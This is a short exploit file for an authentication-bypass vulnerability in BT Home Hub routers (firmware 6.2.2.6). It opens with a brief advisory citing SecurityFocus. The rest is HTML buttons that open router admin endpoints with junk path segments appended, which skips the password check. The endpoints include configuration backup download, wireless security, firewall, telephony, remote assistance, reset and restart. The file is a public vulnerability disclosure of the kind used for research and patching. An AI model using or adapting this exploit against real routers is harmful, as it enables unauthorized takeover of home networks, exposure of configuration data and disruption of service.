82 lines
2.5 KiB
HTML
Executable file
82 lines
2.5 KiB
HTML
Executable file
source: http://www.securityfocus.com/bid/26333/info
|
|
|
|
BT Home Hub is prone to an authentication-bypass vulnerability.
|
|
|
|
An attacker could exploit this issue to gain unauthorized access to the affected device.
|
|
|
|
BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected.
|
|
|
|
This exploit allows you to access most pages on a BTHomeHub Router, without needing to know the password. It has been tested to work with firmware version 6.2.2.6.
|
|
|
|
<form>
|
|
<input type="button" value="Download Current Router Configuration"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/backup/user.ini/bthomehub-config')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Wireless Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/_wli_/cfg/djfkhfd')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Wireless Security Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/_wli_/seccfg/dbddfbdb')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Wireless Repeater Configuation Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/_wds_/cfg/fjfgfgh')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Telephony Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/_voip_/cfg/fhfjhgg')">
|
|
</form>
|
|
<form>
|
|
<input type="button" value="IP Addresses Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/intfs/_intf_/cfg/dgdgdg')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Devices Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/devs/cfg/fefefef')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Firewall Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/secpol/cfg/fjfjhfj')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Reset Router"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/info/reset/gegegee')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Restart Router"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/info/restart/fhfjhgg')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Remote Assistance Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/ras/fjgfgfgh')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Backup and Restore Configuration Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/bandr/fjgfgfgh')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Home Network Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/lan/fjgfgfgh')">
|
|
</form>
|
|
|
|
<form>
|
|
<input type="button" value="Phone Logs Page"
|
|
onclick="window.open('http://bthomehub.home/cgi/b/_voip_/stats/dhjfhdfjh')">
|
|
</form>
|
|
|
|
|
|
|
|
|